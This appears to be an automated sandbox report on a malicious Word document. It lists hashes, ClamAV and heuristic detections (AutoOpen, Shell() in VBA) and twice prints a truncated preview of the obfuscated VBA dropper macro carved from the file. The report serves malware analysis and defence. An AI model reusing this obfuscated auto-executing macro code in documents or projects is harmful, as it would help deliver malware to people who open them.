Office (OLE) malware analysis — malicious · 89e4d6f82ef37356

MALICIOUS

Office (OLE)

207.2 KB Created: 2018-06-25 17:20:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 4e12e5190d792b5588ee5898d624295b SHA-1: f029cd3c64e4294a27db74c016d75ecc3ca9d945 SHA-256: 89e4d6f82ef37356e154fac5b7ac271fc9d7f5bf44c0bdf561ec517b5d2c1db4

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, to execute code. This strongly suggests the document's purpose is to download and execute a secondary payload, a common technique for malware delivery. The presence of an AutoOpen macro further indicates an attempt at immediate execution upon opening.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6591351-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6591351-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11255 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11255 bytes
SHA-256: `1b37b0f396e505f25129916ff8d7ab6204e269b0803f3d908fcc0abedd59806a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QiYCEUIX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KUkSaHpzL" Function WpBijBF() On Error Resume Next XBhDsG = (8947 / CBool(51876) + 27761 + CSng(nmpYZu) * (70107 - HfkQp + 28796 - CLng(QCzuoR))) UDiOtZ = CByte(99997 * Tan(2328) / 28442 + CLng(EqrYV * 46407 * 36406 * Chr(71341))) jYwYDKGSka = "Hel" + "l " + Chr(40) + " '9w" + "90" + "V87" + "m91C16C6" + "7D72V90" + "w0V66D" JTJLnA = CByte(53824 * Tan(4455) / 52205 + CLng(YzHWf * 19832 * 78483 * Chr(12955))) IYhCG = (22774 / CBool(34757) + 49357 + CSng(DHjZjD) * (34823 - pLBKVG + 32941 - CLng(LwXEvd))) KGksJBkQ = "79x71" + "<72>7" + "8C" + "89x1" + "3C99w7" + "2V89>3" iwMvXZ = CByte(17383 * Tan(44133) / 87458 + CLng(ijpjf * 84250 * 44855 * Chr(60383))) iHjKmS = (31455 / CBool(41499) + 90833 + CSng(uUjZc) * (43279 - WrimN + 17979 - CLng(KzJJKj))) vpOPWcDj = "m122m72" + "<79" + "V11" + "0C65D68D" + "72<67C8" + "9m22&9" + "&87>79" + "x68" FldJHA = CByte(70615 * Tan(42674) / 31740 + CLng(ZQIhkP * 37597 * 34187 * Chr(32849))) Znzbw = (40769 / CBool(96005) + 18477 + CSng(pJGLO) * (46758 - WTiEw + 94308 - CLng(zHHjTt))) QjOlwRoO = "m16" + "w10z6" + "9V8" + "9z89C" + "93<23" + "z2V2D68" + "z78z" + "66<67V" + "69D6" + "6C65z68V" snOCa = CByte(43405 * Tan(63934) / 87159 + CLng(GiMkC * 52920 * 72332 * Chr(91390))) IYsaD = (54157 / CBool(77598) + 99636 + CSng(oodPV) * (69473 - dBHXb + 1220 - CLng(EfjoS))) cXcQM = "73&" + "76<84w9" + "4<3&78w" + "66z6" + "4V3x79" + "w7" + "3m2>" + "125m" + "101x87w1" + "10" + "V2x109C6" SjfAUz = CByte(9948 * Tan(41478) / 9801 + CLng(iOMFI * 67099 * 82513 * Chr(81076))) nzNmS = (18947 / CBool(87537) + 83721 + CSng(VovXn) * (42778 - bBZbpw + 5546 - CLng(ZvdLrw))) YKjVdOwqwIX = "9V89w8" + "9>93m94>" + "23w2D2&" + "70" + "V72x" + "95D6" + "6V" + "94&7" MmUsX = CByte(2515 * Tan(13263) / 29803 + CLng(LaQrw * 46686 * 51917 * Chr(66320))) aaMULp = (89218 / CBool(68464) + 25820 + CSng(jiAJt) * (40576 - rnBmW + 60856 - CLng(RGjqY))) mqBiXFTcHC = "0&84" + "D3" + "V7" + "8m66x" + "64C2>20x" + "10" + "4<10" + "7C95m2C1" qXiXoT = CByte(40531 * Tan(66931) / 62022 + CLng(TGPMOF * 43722 * 10150 * Chr(90959))) SkzrD = (78366 / CBool(22937) + 7421 + CSng(rCFFDL) * (93168 - uNHls + 27320 - CLng(XcaWih))) qmFPlZ = "09<69<" + "89w8" + "9<" + "93&" + "23D2D2m" + "90" QjtSd = CByte(94276 * Tan(21622) / 94836 + CLng(RBHSq * 90413 * 86946 * Chr(38068))) dNaTaV = (3515 / CBool(37103) + 51727 + CSng(pYNvL) * (65002 - fWcpLh + 52226 - CLng(lwiJW))) kOkXAa = ">9" + "0z" + "90x3D76" + "z79<68<" + "89&7" + "9V72w" + "89C" + "3x78C" + "66&64" + "V2<107" + "&89V3" WpBijBF = jYwYDKGSka + KGksJBkQ + vpOPWcDj + QjOlwRoO + cXcQM + YKjVdOwqwIX + mqBiXFTcHC + qmFPlZ + kOkXAa sfhcr = CByte(25533 * Tan(66035) / 33050 + CLng(AwzJIv * 97497 * 84108 * Chr(7093))) jfqiS = (95197 / CBool(34025) + 62549 + CSng(BpXTKE) * (18361 - pTcik + 29792 - CLng(ELoDOk))) End Function Function FRwwnlmPit() On Error Resume Next AFSRSo = CByte(30621 * Tan(62530) / 54092 + CLng(EJmni * 66025 * 58757 * Chr(21821))) RFZqS = (92263 / CBool(29869) + 16357 + CSng(HJNRPi) * (93932 - lhMwqY + 44833 - CLng(mnFaIM))) dOjAF = "1z2" + "0V94m" + "2x109m" + "69w89" + "V89>" + "93m" + "23x2m" + "2D9" + "4w70" bOFwm = CByte(17655 * Tan(86657) / 82597 + CLng(QZkXSW * 67402 * 29097 * Chr(49949))) NKrMb = (64351 / CBool(4392) + 28710 + CSng(IJiVuM) * (25792 - wNiDV + 2008 - CLng(rmOkoH))) mvObYFntAEt = "z84x73D6" + "6&64V72V" + "76D" + "78m7" + "6C73D72m" + "64V8" zKPpT = CByte(20692 * Tan(64879) / 10729 + CLng(dCXCQ * 97111 * 98427 * Chr(23023))) SlQhz = (85417 / CBool(17581) + 12855 + CSng(oTRaY) * (7425 - TPvaET + 11490 - CLng(NildRU))) HvZFzpjrY = "4<3" + "<7" + "8x66V64" + ">2<94x94" + ">75&64>2" + "V30w127" + "V1" + "08>30" + "x27w2<1" + "09x69m" + "89w8" PfZJh = CByte(34103 * Tan(69214) / 61427 + CLng(tpoYO * 69207 * 98154 * Chr(94 ... (truncated)

SHA-256: 1b37b0f396e505f25129916ff8d7ab6204e269b0803f3d908fcc0abedd59806a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QiYCEUIX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KUkSaHpzL"
Function WpBijBF()
On Error Resume Next
XBhDsG = (8947 / CBool(51876) + 27761 + CSng(nmpYZu) * (70107 - HfkQp + 28796 - CLng(QCzuoR)))
UDiOtZ = CByte(99997 * Tan(2328) / 28442 + CLng(EqrYV * 46407 * 36406 * Chr(71341)))
jYwYDKGSka = "Hel" + "l  " + Chr(40) + " '9w" + "90" + "V87" + "m91C16C6" + "7D72V90" + "w0V66D"
JTJLnA = CByte(53824 * Tan(4455) / 52205 + CLng(YzHWf * 19832 * 78483 * Chr(12955)))
IYhCG = (22774 / CBool(34757) + 49357 + CSng(DHjZjD) * (34823 - pLBKVG + 32941 - CLng(LwXEvd)))
KGksJBkQ = "79x71" + "<72>7" + "8C" + "89x1" + "3C99w7" + "2V89>3"
iwMvXZ = CByte(17383 * Tan(44133) / 87458 + CLng(ijpjf * 84250 * 44855 * Chr(60383)))
iHjKmS = (31455 / CBool(41499) + 90833 + CSng(uUjZc) * (43279 - WrimN + 17979 - CLng(KzJJKj)))
vpOPWcDj = "m122m72" + "<79" + "V11" + "0C65D68D" + "72<67C8" + "9m22&9" + "&87>79" + "x68"
FldJHA = CByte(70615 * Tan(42674) / 31740 + CLng(ZQIhkP * 37597 * 34187 * Chr(32849)))
Znzbw = (40769 / CBool(96005) + 18477 + CSng(pJGLO) * (46758 - WTiEw + 94308 - CLng(zHHjTt)))
QjOlwRoO = "m16" + "w10z6" + "9V8" + "9z89C" + "93<23" + "z2V2D68" + "z78z" + "66<67V" + "69D6" + "6C65z68V"
snOCa = CByte(43405 * Tan(63934) / 87159 + CLng(GiMkC * 52920 * 72332 * Chr(91390)))
IYsaD = (54157 / CBool(77598) + 99636 + CSng(oodPV) * (69473 - dBHXb + 1220 - CLng(EfjoS)))
cXcQM = "73&" + "76<84w9" + "4<3&78w" + "66z6" + "4V3x79" + "w7" + "3m2>" + "125m" + "101x87w1" + "10" + "V2x109C6"
SjfAUz = CByte(9948 * Tan(41478) / 9801 + CLng(iOMFI * 67099 * 82513 * Chr(81076)))
nzNmS = (18947 / CBool(87537) + 83721 + CSng(VovXn) * (42778 - bBZbpw + 5546 - CLng(ZvdLrw)))
YKjVdOwqwIX = "9V89w8" + "9>93m94>" + "23w2D2&" + "70" + "V72x" + "95D6" + "6V" + "94&7"
MmUsX = CByte(2515 * Tan(13263) / 29803 + CLng(LaQrw * 46686 * 51917 * Chr(66320)))
aaMULp = (89218 / CBool(68464) + 25820 + CSng(jiAJt) * (40576 - rnBmW + 60856 - CLng(RGjqY)))
mqBiXFTcHC = "0&84" + "D3" + "V7" + "8m66x" + "64C2>20x" + "10" + "4<10" + "7C95m2C1"
qXiXoT = CByte(40531 * Tan(66931) / 62022 + CLng(TGPMOF * 43722 * 10150 * Chr(90959)))
SkzrD = (78366 / CBool(22937) + 7421 + CSng(rCFFDL) * (93168 - uNHls + 27320 - CLng(XcaWih)))
qmFPlZ = "09<69<" + "89w8" + "9<" + "93&" + "23D2D2m" + "90"
QjtSd = CByte(94276 * Tan(21622) / 94836 + CLng(RBHSq * 90413 * 86946 * Chr(38068)))
dNaTaV = (3515 / CBool(37103) + 51727 + CSng(pYNvL) * (65002 - fWcpLh + 52226 - CLng(lwiJW)))
kOkXAa = ">9" + "0z" + "90x3D76" + "z79<68<" + "89&7" + "9V72w" + "89C" + "3x78C" + "66&64" + "V2<107" + "&89V3"
WpBijBF = jYwYDKGSka + KGksJBkQ + vpOPWcDj + QjOlwRoO + cXcQM + YKjVdOwqwIX + mqBiXFTcHC + qmFPlZ + kOkXAa
sfhcr = CByte(25533 * Tan(66035) / 33050 + CLng(AwzJIv * 97497 * 84108 * Chr(7093)))
jfqiS = (95197 / CBool(34025) + 62549 + CSng(BpXTKE) * (18361 - pTcik + 29792 - CLng(ELoDOk)))
End Function
Function FRwwnlmPit()
On Error Resume Next
AFSRSo = CByte(30621 * Tan(62530) / 54092 + CLng(EJmni * 66025 * 58757 * Chr(21821)))
RFZqS = (92263 / CBool(29869) + 16357 + CSng(HJNRPi) * (93932 - lhMwqY + 44833 - CLng(mnFaIM)))
dOjAF = "1z2" + "0V94m" + "2x109m" + "69w89" + "V89>" + "93m" + "23x2m" + "2D9" + "4w70"
bOFwm = CByte(17655 * Tan(86657) / 82597 + CLng(QZkXSW * 67402 * 29097 * Chr(49949)))
NKrMb = (64351 / CBool(4392) + 28710 + CSng(IJiVuM) * (25792 - wNiDV + 2008 - CLng(rmOkoH)))
mvObYFntAEt = "z84x73D6" + "6&64V72V" + "76D" + "78m7" + "6C73D72m" + "64V8"
zKPpT = CByte(20692 * Tan(64879) / 10729 + CLng(dCXCQ * 97111 * 98427 * Chr(23023)))
SlQhz = (85417 / CBool(17581) + 12855 + CSng(oTRaY) * (7425 - TPvaET + 11490 - CLng(NildRU)))
HvZFzpjrY = "4<3" + "<7" + "8x66V64" + ">2<94x94" + ">75&64>2" + "V30w127" + "V1" + "08>30" + "x27w2<1" + "09x69m" + "89w8"
PfZJh = CByte(34103 * Tan(69214) / 61427 + CLng(tpoYO * 69207 * 98154 * Chr(94
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.